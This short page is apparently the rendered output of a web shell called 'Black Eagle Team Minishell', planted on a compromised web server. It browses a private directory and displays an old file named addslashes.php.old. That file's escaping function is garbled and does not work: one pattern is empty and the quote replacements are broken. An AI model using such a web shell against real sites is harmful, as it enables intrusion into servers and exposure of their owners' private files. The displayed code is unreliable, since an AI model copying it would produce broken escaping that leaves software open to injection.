Black Eagle Team Minishell
Path:
/
home
/
ccpsafy
/
www.old
/
private
/
[
Home
]
File: addslashes.php.old
function addslashes(txt) { txt = txt.replace(//g,"") txt = txt.replace(/'/g,"'") txt= txt.replace(/"/g,""") return txt }
©
2020 Black Eagle Team